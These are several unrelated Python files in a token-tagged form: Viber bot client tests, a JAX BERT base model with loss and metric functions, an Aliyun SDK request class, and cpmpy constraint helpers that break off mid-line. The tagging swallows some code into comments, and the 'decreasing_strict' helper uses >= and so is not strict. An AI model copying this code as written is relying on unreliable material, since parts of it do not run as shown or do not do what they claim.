<import_stmt>logging<import_stmt>unittest.mock<import_from_stmt>viberbot Api<import_from_stmt>viberbot.api.user_profile UserProfile<import_from_stmt>viberbot.api.viber_requests ViberConversationStartedRequest<import_from_stmt>viberbot.api.viber_requests ViberFailedRequest<import_from_stmt>viberbot.api.viber_requests ViberMessageRequest<import_from_stmt>viberbot.api.viber_requests ViberSubscribedRequest<import_from_stmt>viberbot.api.viber_requests ViberUnsubscribedRequest<import_from_stmt>programy.clients.restful.flask.viber.client ViberBotClient<import_from_stmt>programy.clients.restful.flask.viber.config ViberConfiguration<import_from_stmt>programy.clients.render.text TextRenderer<import_from_stmt>programytest.clients.arguments MockArgumentParser<class_stmt>MockViberApi(Api)<block_start><def_stmt>__init__ self configuration request=<none> verified=<true><block_start>self._logger=logging.getLogger()<line_sep>self._messages=[]<line_sep>self._request=request<line_sep>self._verified=verified<block_end><def_stmt>set_webhook self url webhook_events=<none> is_inline=<false><block_start><pass><block_end><def_stmt>send_messages self to messages chat_id=<none><block_start>self._messages=messages<block_end><def_stmt>verify_signature self request_data signature<block_start><return>self._verified<block_end><def_stmt>parse_request self request_data<block_start><if_stmt>self._request<is><none><block_start>super(MockViberApi self).parse_request(request_data)<block_end><return>self._request<block_end><block_end><class_stmt>MockViberBotClient(ViberBotClient)<block_start><def_stmt>__init__ self argument_parser=<none> viber_client=<none><block_start>self.test_viber_client=viber_client<line_sep>self.test_question=<none><line_sep>ViberBotClient.__init__(self argument_parser)<block_end><def_stmt>parse_configuration self<block_start>self.configuration.client_configuration._name="ViberBot"<line_sep>self.configuration.client_configuration._avatar="viber.svg"<line_sep>self.configuration.client_configuration._webhook="http://localhost/webhook"<block_end><def_stmt>set_question self question<block_start>self.test_question=question<block_end><def_stmt>get_license_keys self<block_start>self._viber_token="VIBER_TOKEN"<block_end><def_stmt>ask_question self sessionid question<block_start><if_stmt>self.test_question<is><not><none><block_start><return>self.test_question<block_end><return>super(MockViberBotClient self).ask_question(sessionid question)<block_end><def_stmt>create_viber_api self configuration<block_start><return>MockViberApi(configuration)<block_end><def_stmt>create_viber_bot self viber_token<block_start><if_stmt>self.test_viber_client<is><not><none><block_start><return>self.test_viber_client<block_end><return>super(MockViberBotClient self).create_viber_bot(viber_token)<block_end><block_end><class_stmt>ViberBotClientTests(unittest.TestCase)<block_start><def_stmt>test_viber_client_init self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>self.assertEqual("VIBER_TOKEN" client._viber_token)<line_sep>self.assertIsNotNone(client._viber_bot)<line_sep>self.assertIsInstance(client.get_client_configuration() ViberConfiguration)<line_sep>self.assertIsInstance(client._viber_bot Api)<line_sep>self.assertFalse(client._render_callback())<line_sep>self.assertIsInstance(client.renderer TextRenderer)<block_end><def_stmt>test_create_viber_bot_no_token self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>bot=client.create_viber_bot(<none>)<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_create_viber_bot_no_name self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>client.configuration.client_configuration._name=<none><line_sep>bot=client.create_viber_bot("TOKEN")<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_create_viber_bot_no_avatar self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>client.configuration.client_configuration._avatar=<none><line_sep>bot=client.create_viber_bot("TOKEN")<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_create_viber_bot_no_webhook self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>client.configuration.client_configuration._webhook=<none><line_sep>bot=client.create_viber_bot("TOKEN")<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_handle_message_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberMessageRequest()<line_sep>request._message="Hello"<line_sep>request._sender=UserProfile(user_id="User123")<line_sep>client.test_question="Hi there"<line_sep>client.handle_message_request(request)<line_sep>self.assertIsNotNone(client.test_viber_client)<line_sep>self.assertIsNotNone(client.test_viber_client._messages)<line_sep>self.assertEqual(1 len(client.test_viber_client._messages))<line_sep>self.assertEqual("Hi there" client.test_viber_client._messages[0].text)<block_end><def_stmt>test_handle_subscribed_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberSubscribedRequest()<line_sep>request._user=UserProfile(user_id="User123")<line_sep>client.handle_subscribed_request(request)<line_sep>self.assertIsNotNone(client.test_viber_client)<line_sep>self.assertIsNotNone(client.test_viber_client._messages)<line_sep>self.assertEqual(1 len(client.test_viber_client._messages))<line_sep>self.assertEqual("Thanks for subscribing!" client.test_viber_client._messages[0].text)<block_end><def_stmt>test_handle_unsubscribed_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberUnsubscribedRequest()<line_sep>request._user_id="User123"<line_sep>client.handle_unsubscribed_request(request)<block_end><def_stmt>test_handle_conversation_started_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberConversationStartedRequest()<line_sep>request._user=UserProfile(user_id="User123")<line_sep>client.handle_conversation_started_request(request)<block_end><def_stmt>test_handle_failed_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberFailedRequest()<line_sep>request._user_id="User123"<line_sep>request._desc="Whoops, I know nothing!"<line_sep>client.handle_failed_request(request)<block_end><def_stmt>test_handle_unknown_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=unittest.mock.Mock()<line_sep>client.handle_unknown_request(request)<block_end><def_stmt>test_receive_message self<block_start>arguments=MockArgumentParser()<line_sep>viber_api=MockViberApi(<none>)<line_sep>client=MockViberBotClient(arguments viber_client=viber_api)<line_sep>self.assertIsNotNone(client)<line_sep>request=unittest.mock.Mock()<line_sep>request.get_data.return_value="{}"<line_sep>request.headers={"X-Viber-Content-Signature":"SIGNATURE"}<line_sep>return_request=ViberMessageRequest()<line_sep>return_request._message="Hello"<line_sep>return_request._sender=UserProfile(user_id="User123")<line_sep>viber_api._request=return_request<line_sep>client.receive_message(request)<block_end><block_end>
"""Base class for models working with bert."""<import_from_stmt>typing Callable Dict Optional Tuple Union<import_from_stmt>flax.training common_utils<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_stmt>numpy<as>np<import_from_stmt>scenic.model_lib.base_models base_model<import_from_stmt>scenic.model_lib.base_models model_utils<line_sep># Aliases for custom types: Batch=Dict[str jnp.ndarray]<line_sep>MetricFn=Callable[[Dict[str jnp.ndarray] Batch] Dict[str Tuple[float int]]]<line_sep>LossFn=Callable[[Dict[str jnp.ndarray] Batch Optional[jnp.ndarray]] float]<def_stmt>num_examples logits:jnp.ndarray weights:Optional[jnp.ndarray]=<none><arrow>Union[jnp.ndarray int]<block_start><if_stmt>weights<is><none><block_start><return>logits.shape[0]<block_end><return>weights.sum()<block_end><def_stmt>sparse_weighted_unnormalized_softmax_cross_entropy logits:jnp.ndarray labels:jnp.ndarray mlm_weights:jnp.ndarray batch_mask_weights:Optional[jnp.ndarray]=<none><arrow>jnp.ndarray<block_start>"""Computes sparse weighted softmax cross entropy give logits and targets. Args: logits: Logits of shape [batch_size, length, vocab_size]. labels: Labels from {0 ... vocab_size - 1} of shape [batch_size, length]. mlm_weights: Weights of shape [batch_size, length], indicating masked tokens in masked language modeling task. batch_mask_weights: None or array of shape [batch,] indicating masked examples. Returns: Per example Loss value. """<line_sep>batch_size,length,vocab_size=logits.shape<line_sep>logits=jax.nn.log_softmax(logits)<line_sep>logits,mlm_weights=logits.ravel() mlm_weights.ravel()<line_sep>offsets=(np.arange(batch_size<times>length)<times>vocab_size).reshape((-1 length))<line_sep>labels=(labels+offsets).ravel()<line_sep>loss=-jnp.take(logits labels axis=0)<line_sep>loss=loss<times>mlm_weights<line_sep>loss=loss.sum(axis=-1)/(mlm_weights.sum(axis=-1)+1e-8)<if_stmt>batch_mask_weights<is><not><none><block_start>loss=model_utils.apply_weights(loss batch_mask_weights)<block_end><return>loss<block_end><def_stmt>sparse_weighted_softmax_cross_entropy logits:jnp.ndarray labels:jnp.ndarray mlm_weights:jnp.ndarray batch_mask_weights:Optional[jnp.ndarray]=<none><arrow>jnp.ndarray<block_start>"""Same as weighted_unnormalized, but additionally takes a mean. Args: logits: Logits of shape [batch_size, length, vocab_size]. labels: Labels from {0 ... vocab_size - 1} of shape [batch_size, length]. mlm_weights: Weights of shape [batch_size, length], indicating masked tokens in masked language modeling task. batch_mask_weights: None or array of shape [batch,] indicating masked examples. Returns: The mean cross entropy of the examples in the given batch as a scalar. """<if_stmt>batch_mask_weights<is><not><none><block_start>normalization=batch_mask_weights.sum()<block_end><else_stmt><block_start>normalization=mlm_weights.shape[0]# Batch size. <block_end>sparse_unnormalized_softmax_ce=sparse_weighted_unnormalized_softmax_cross_entropy(logits labels mlm_weights batch_mask_weights)<line_sep><return>jnp.sum(sparse_unnormalized_softmax_ce)/(normalization+1e-8)<block_end><def_stmt>sparse_weighted_per_example_accuracy logits:jnp.ndarray labels:jnp.ndarray mlm_weights:jnp.ndarray batch_mask_weights:Optional[jnp.ndarray]=<none><arrow>jnp.ndarray<block_start>"""Computes weighted number of correctly classified over the given batch. This computes the weighted number of correctly classified masked tokens in a single, potentially padded minibatch. If the minibatch/inputs is padded (i.e., it contains null examples/pad pixels) it is assumed that batch_mask_weights is a binary mask where 0 indicates that the example/pixel is null/padded. We assume the trainer will aggregate and divide by number of samples. Args: logits: Logits of shape [batch_size, length, vocab_size]. labels: Labels from {0 ... vocab_size - 1} of shape [batch_size, length]. mlm_weights: Weights of shape [batch_size, length], indicating masked tokens in masked language modeling task. batch_mask_weights: None or array of shape [batch,] indicating masked examples. Returns: Per example accuracy of predicted masked tokens. """<line_sep>preds=jnp.argmax(logits axis=-1)<line_sep>correct=jnp.equal(preds labels)<line_sep>correct=correct<times>mlm_weights<line_sep># Shape of per example acccuracy will be (batch_size,). per_ex_accuracy=correct.sum(axis=-1)/(mlm_weights.sum(axis=-1)+1e-8)<if_stmt>batch_mask_weights<is><not><none><block_start>per_ex_accuracy=model_utils.apply_weights(per_ex_accuracy batch_mask_weights)<block_end><return>per_ex_accuracy<block_end><def_stmt>bert_metrics_function outputs:Dict[str jnp.ndarray] batch:Batch<arrow>Dict[str Tuple[float int]]<block_start>"""Calcualte metrics for the BERT task. Args: outputs: Output of model that has masked LM logits of shape [batch, length, vocab_size], and next sentence prediction logits of shape [batch, 2]. batch: Batch of data that has 'masked_lm_ids', 'masked_lm_weights' and 'next_sentence_labels'. Returns: A dict of metrics, in which keys are metrics name and values are tuples of (metric, normalizer). """<line_sep>mlm_logits=outputs['mlm_logits']<line_sep>nsp_logits=outputs['nsp_logits']<line_sep>next_sentence_labels=common_utils.onehot(batch['next_sentence_labels'] 2)<line_sep>batch_weights=batch.get('batch_mask')# batch_mask might not be defined per_ex_nsp_loss=model_utils.weighted_unnormalized_softmax_cross_entropy(nsp_logits next_sentence_labels batch_weights)<line_sep>per_ex_nsp_accuracy=model_utils.weighted_correctly_classified(nsp_logits next_sentence_labels batch_weights)<line_sep>per_ex_mlm_loss=sparse_weighted_unnormalized_softmax_cross_entropy(mlm_logits batch['masked_lm_ids'] batch['masked_lm_weights'] batch_weights)<line_sep>per_ex_mlm_accuracy=sparse_weighted_per_example_accuracy(mlm_logits batch['masked_lm_ids'] batch['masked_lm_weights'] batch_weights)<line_sep># This psum is required to correctly evaluate with multihost. Only host 0 # will report the metrics, so we must aggregate across all hosts. The psum # will map an array of shape [n_global_devices, batch_size] -> [batch_size] # by summing across the devices dimension. The outer sum then sums across the # batch dim. The result is then we have summed across all samples in the # sharded batch. evaluated_metrics={}<line_sep>normalizer=num_examples(mlm_logits batch_weights)<for_stmt>name,value zip(['nsp_loss' 'nsp_accuracy' 'mlm_loss' 'mlm_accuracy' 'loss'] [per_ex_nsp_loss per_ex_nsp_accuracy per_ex_mlm_loss per_ex_mlm_accuracy per_ex_nsp_loss+per_ex_mlm_loss])<block_start>evaluated_metrics[name]=model_utils.psum_metric_normalizer((value normalizer))<block_end><return>evaluated_metrics<block_end><def_stmt>compute_bert_loss mlm_logits:jnp.ndarray nsp_logits:jnp.ndarray batch:Batch<arrow>float<block_start>"""Computes BERT loss. Args: mlm_logits: Masked LM logits of shape [batch, length, vocab_size]. nsp_logits: Next sentence prediction logits of shape [batch, 2]. batch: Batch of data that has 'masked_lm_ids', 'masked_lm_weights' and 'next_sentence_labels'. Returns: Loss value. """<line_sep>next_sentence_labels=common_utils.onehot(batch['next_sentence_labels'] 2)<line_sep>batch_weights=batch.get('batch_mask')# batch_mask might not be defined nsp_loss=model_utils.weighted_softmax_cross_entropy(nsp_logits next_sentence_labels batch_weights)<line_sep>mlm_loss=sparse_weighted_softmax_cross_entropy(mlm_logits batch['masked_lm_ids'] batch['masked_lm_weights'] batch_weights)<line_sep><return>nsp_loss+mlm_loss<block_end><class_stmt>BERTBaseModel(base_model.BaseModel)<block_start>"""Defines BERT base models. A model is class with three members: get_metrics_fn, loss_fn, and a flax_model. get_metrics_fn returns a callable function, metric_fn, that calculates the metrics and returns a dictionary. The metric function computes f(x_i, y_i) on a minibatch, it has API: ```metric_fn(logits, label, weights).``` The trainer will then aggregate and compute the mean across all samples evaluated. loss_fn is a function of API loss = loss_fn(logits, batch, model_params=None). This model class defines a softmax_cross_entropy_loss with weight decay, where the weight decay factor is determined by config.l2_decay_factor. flax_model is returned from the build_flax_model function. A typical usage pattern will be: ``` model_cls = bert_model.BERTModel model = model_cls(config, dataset.meta_data) flax_model = model.build_flax_model dummy_input = {name: jnp.zeros(input_shape, model_input_dtype), ...} model_state, params = flax_model.init( rng, dummy_input, train=False).pop('params') ``` And this is how to call the model:s ``` variables = {'params': params, **model_state} output, new_model_state = flax_model.apply(variables, inputs, ...) ``` """<def_stmt>get_metrics_fn self split:Optional[str]=<none><arrow>MetricFn<block_start>"""Returns a callable metric function for the model. Args: split: The split for which we calculate the metrics. It should be one of the ['train', 'validation', 'test']. Returns: A metric function with the following API: ```metrics_fn(outputs, batch)``` """<del_stmt>split# For all splits, we return the same metric functions. <return>bert_metrics_function<block_end><def_stmt>loss_function self outputs:Dict[str jnp.ndarray] batch:Batch model_params:Optional[jnp.ndarray]=<none><arrow>float<block_start>"""Returns softmax cross entropy loss with an L2 penalty on the weights. Args: outputs: a dictionary containing either 'logits' key of shape [batch, length, num_classes] or 'nsp_logits' of shape [batch, 2] and 'mlm_logits' of shape [batch, length, vocab_size] (for 'BERT' task). batch: Batch of data that has 'label' and optionally 'batch_mask'. model_params: Parameters of the model, for optionally applying regularization. Returns: Total loss. """<line_sep>total_loss=compute_bert_loss(outputs['mlm_logits'] outputs['nsp_logits'] batch)<if_stmt>self.config.get('l2_decay_factor')<block_start>l2_loss=model_utils.l2_regularization(model_params)<line_sep>total_loss<augadd>0.5<times>self.config.l2_decay_factor<times>l2_loss<block_end><return>total_loss<block_end><def_stmt>build_flax_model self<block_start><raise>NotImplementedError('Subclasses must implement build_flax_model().')<block_end><def_stmt>default_flax_model_config self<block_start>"""Default config for the flax model that is built in `build_flax_model`. This function in particular serves the testing functions and supposed to provide config tha are passed to the flax_model when it's build in `build_flax_model` function, e.g., `model_dtype_str`. """<line_sep><raise>NotImplementedError('Subclasses must implement default_flax_model_config().')<block_end><block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_from_stmt>aliyunsdkcore.request RpcRequest<class_stmt>DescribeFileRequest(RpcRequest)<block_start><def_stmt>__init__ self<block_start>RpcRequest.__init__(self 'cloudmarketing' '2018-09-10' 'DescribeFile')<line_sep>self.set_method('POST')<block_end><def_stmt>get_FileName self<block_start><return>self.get_query_params().get('FileName')<block_end><def_stmt>set_FileName self FileName<block_start>self.add_query_param('FileName' FileName)<block_end><def_stmt>get_DataSchemaStatusLists self<block_start><return>self.get_query_params().get('DataSchemaStatusLists')<block_end><def_stmt>set_DataSchemaStatusLists self DataSchemaStatusLists<block_start><for_stmt>depth1 range(len(DataSchemaStatusLists))<block_start><if_stmt>DataSchemaStatusLists[depth1]<is><not><none><block_start>self.add_query_param('DataSchemaStatusList.'+str(depth1+1) DataSchemaStatusLists[depth1])<block_end><block_end><block_end><def_stmt>get_PageNo self<block_start><return>self.get_query_params().get('PageNo')<block_end><def_stmt>set_PageNo self PageNo<block_start>self.add_query_param('PageNo' PageNo)<block_end><def_stmt>get_PageSize self<block_start><return>self.get_query_params().get('PageSize')<block_end><def_stmt>set_PageSize self PageSize<block_start>self.add_query_param('PageSize' PageSize)<block_end><def_stmt>get_FileId self<block_start><return>self.get_query_params().get('FileId')<block_end><def_stmt>set_FileId self FileId<block_start>self.add_query_param('FileId' FileId)<block_end><block_end>
""" This package includes my constraints/utilities/etc for cpmpy. This cpmpy model was written by <NAME> (<EMAIL>) See also my cpmpy page: http://hakank.org/cpmpy/ """<import_stmt>sys math re<import_stmt>itertools<import_stmt>numpy<as>np<import_from_stmt>functools reduce<import_from_stmt>cpmpy *<import_from_stmt>cpmpy.expressions.globalconstraints GlobalConstraint<import_from_stmt>cpmpy.solvers *<import_from_stmt>ortools.sat.python cp_model<as>ort<import_from_stmt>cpmpy.transformations.flatten_model flatten_constraint flatten_model<import_from_stmt>cpmpy.transformations.get_variables print_variables<def_stmt>AllDifferent_except_0 args<block_start>""" Ensure that all arguments that are != 0 must have distinct values. """<line_sep># Note: The parenthesis around (var1 != 0) are needed! <return>[((var1<ne>0)&(var2<ne>0)).implies(var1<ne>var2)<for>var1,var2 all_pairs(args)]<block_end><def_stmt>all_different_except_0 args<block_start>""" Alias for AllDifferent_except_0(args). """<line_sep><return>AllDifferent_except_0(args)<block_end><def_stmt>to_num a n base<block_start>""" to_num(a, n, base) Ensure that the digits in array `a` corresponds to the number `n` in base `base`. """<line_sep>tlen=len(a)<line_sep><return>n<eq>sum([(base<power>(tlen-i-1))<times>a[i]<for>i range(tlen)])<block_end><def_stmt>increasing args<block_start>""" Ensure that the values in args are increasing. """<line_sep><return>[args[i-1]<le>args[i]<for>i range(1 len(args))]<block_end><def_stmt>increasing_strict args<block_start>""" Ensure that the values in args are strict increasing. """<line_sep><return>[args[i-1]<l>args[i]<for>i range(1 len(args))]<block_end><def_stmt>decreasing args<block_start>""" Ensure that the values in args are decreasing. """<line_sep><return>[args[i-1]<ge>args[i]<for>i range(1 len(args))]<block_end><def_stmt>decreasing_strict args<block_start>""" Ensure that the values in args are strict decreasing. """<line_sep><return>[args[i-1]<ge>args[i]<for>i range(1 len(args))]<block_end><def_stmt>all_pairs args<block_start>""" Generate all pairs from the list of lists args. (stolen from cmppy/globalconstraints.py) """<line_sep><return>list(itertools.combinations(args 2))<block_end><def_stmt>get_different_solution m x<block_start>""" Add the current solution (x) in the model to generate other solutions. Usage: # ... ss = CPM_ortools(model) if ss.solve(): print(x.value()) get_different_solution(ss, x) Note: The array in x must be a flattened array. If there are many decision variables, use flatten_lists(a) to flatten out the array. E.g. # ... ss = CPM_ortools(model) while ss.solve(): print(x.value()) # an array print(y.value()) # a variable print(z.value()) # another variable get_different_solution(ss,flatten_lists([x,[y,z]]) Note that this might be slow for larger models or models with many solutions. If so, try to use - ortools_wrapper() or the simple solution printers such as - ORT_simple_printer - ORT_arrays_printer - ORT_simple_printer_matrix - ORT_simple_function_printer or define a similiar solution printer. """<line_sep># n = len(x) # m += [any([x[i].value() != x[i] for i in range(n)])] m<augadd>[any([t.value()<ne>t<for>t x])]<block_end><def_stmt>flatten_lists a<block_start>""" Flatten a list of lists. Note: a must be an array of arrays (list of lists). See get_different_solution for examples. """<line_sep><return>[item<for>sublist a<for>item sublist]<block_end><class_stmt>ORT_simple_printer(ort.CpSolverSolutionCallback)<block_start>""" A simple printer callback for single array printing. """<def_stmt>__init__ self varmap a num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1# I always start at 1. :-) # populate values before printing # For array of arrays (Tias' original) # for wm in self.vars: # for cpm_var in wm: # cpm_var._value = self.Value(self.varmap[cpm_var]) # For single arrays: <for_stmt>cpm_var self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"#{self.solcount}: {a.value()}")<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_arrays_printer(ort.CpSolverSolutionCallback)<block_start>""" A simple printer callback for array of arrays. """<def_stmt>__init__ self varmap a num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1# I always start at 1. :-) # populate values before printing # For array of arrays (Tias' original) <for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end># For single arrays: <for_stmt>cpm_var self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"#{self.solcount}: {a.value()}")<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_simple_printer_matrix(ort.CpSolverSolutionCallback)<block_start>""" A simple printer callback for printing a matrix. """<def_stmt>__init__ self varmap a rows cols num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.rows=rows<line_sep>self.cols=cols<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>cpm_var self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"#{self.solcount}:")<for_stmt>i range(self.rows)<block_start><for_stmt>j range(self.cols)<block_start>print("%3d"%a[i<times>self.cols+j].value() end=" ")<block_end>print()<block_end>print()<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_simple_function_printer(ort.CpSolverSolutionCallback)<block_start>""" A printer callback with a callback (cb_fun) for printing the array a, which should be structured by the user and including .value() for the variables. Note that the data array a must be a flattening array to be used with this printer callback. Example of a printer function: def f(a): print(a[0].value(),"+",a[1].value(),"=",a[2].value()) which will print a solution such as 2 + 3 = 5 """<def_stmt>__init__ self varmap a cb_fun num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.cb_fun=cb_fun<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<line_sep># For single arrays: <for_stmt>cpm_var self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"\n#{self.solcount}:")<line_sep>self.cb_fun(a)<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_simple_solution_counter(ort.CpSolverSolutionCallback)<block_start>""" This is a solution 'printer' that just count the solutions. """<def_stmt>__init__ self varmap a<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end>(a)=self.vars<block_end><block_end><class_stmt>ORT_function_printer_arrays(ort.CpSolverSolutionCallback)<block_start>""" A printer callback with a callback (cb_fun) for printing the array of arrays a, which should be structured by the user and including .value() for the variables. This version t prints solution number. Example of a printer function: def print_solution(a): print('x:', a[0].value()) print('y:', a[1].value()) """<def_stmt>__init__ self varmap a cb_fun num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.cb_fun=cb_fun<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end>(a)=self.vars<line_sep>print(f"sol #{self.solcount}")<line_sep>self.cb_fun(a)<line_sep>print()<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_function_printer_arrays2(ort.CpSolverSolutionCallback)<block_start>""" A printer callback with a callback (cb_fun) for printing the array of arrays a, which should be structured by the user and including .value() for the variables. This version don't print solution number. Example of a printer function: def print_solution(a): print('x:', a[0].value()) print('y:', a[1].value()) """<def_stmt>__init__ self varmap a cb_fun num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.cb_fun=cb_fun<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end>(a)=self.vars<line_sep>self.cb_fun(a)<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><def_stmt>print_solution a<block_start>""" print_solution(a) Default callback method for printing the solution in a printer callback. Note: a must be an array of arrays to be used with ortools_wrapper (defined below). """<for_stmt>x a<block_start>print(x.value())<block_end><block_end><def_stmt>ortools_wrapper model var_array print_solution=print_solution num_sols=0<block_start>""" ortools_wrapper((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for printing the solutions of a model and tends to be (significantly) faster than using ss = CPM_ortools(model) while ss.solve(): # ... get_different_solution(ss,flatten_lists(var_array)) Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) - print_solution: the method used to do the actual printing of the solution. Default is print_solution(a) defined above. The function can be overwritten / defined in the current constraint model. - num_sols : number of solutions. Default 0, all solutions. Note: For optimality problems, use ortools_wrapper_opt(.) instead. """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_function_printer_arrays(ss.varmap var_array print_solution num_sols)<line_sep># Flags to experiment with # ss.ort_solver.parameters.num_search_workers = 8 # Don't work together with SearchForAllSolutions # ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep>ort_status=ss.ort_solver.SearchForAllSolutions(ss.ort_model cb)<line_sep>ss._after_solve(ort_status)<line_sep>print(ss.status())<line_sep>print("Nr solutions:" cb.solcount)<line_sep>print("Num conflicts:" ss.ort_solver.NumConflicts())<line_sep>print("NumBranches:" ss.ort_solver.NumBranches())<line_sep>print("WallTime:" ss.ort_solver.WallTime())<line_sep>print()<block_end><def_stmt>ortools_wrapper2 model var_array print_solution=print_solution num_sols=0<block_start>""" ortools_wrapper((model,var_array,print_solution=print_solution,num_sols=0) This is a simple wrapper for printing the solutions of a model and tends to be (significantly) faster than using ss = CPM_ortools(model) while ss.solve(): # ... get_different_solution(ss,flatten_lists(var_array)) This version don't print the solution number. Parameters: - model : the model - var_array: the array of arrays of the decision variables to be printed with print_solution(var_array) - print_solution: the method used to do the actual printing of the solution. Default is print_solution(a) defined above. The function can be overwritten / defined in the current constraint model. - num_sols : number of solutions. Default 0, all solutions. Note: For optimality problems, use ortools_wrapper_opt(.) instead. """<line_sep>ss=CPM_ortools(model)<line_sep>cb=ORT_function_printer_arrays2(ss.varmap var_array print_solution num_sols)<line_sep># Flags to experiment with # ss.ort_solver.parameters.num_search_workers = 8 # Don't work together with SearchForAllSolutions # ss.ort_solver.parameters.search_branching = ort.PORTFOLIO_SEARCH # ss.ort_solver.parameters.cp_model_presolve = False ss.ort_solver.parameters.linearization_level=0<line_sep>ss.ort_solver.parameters.cp_model_probing_level=0<line_sep>ort_status=ss.ort_solver.SearchForAllSolutions(ss.ort_model cb)<line_sep>print()<line_sep>ss._after_solve(ort_status)# post-process after solve() call... print(ss.status())<line_sep>print("Nr solutions:" cb.solcount)<line_sep>print("Num conflicts:" 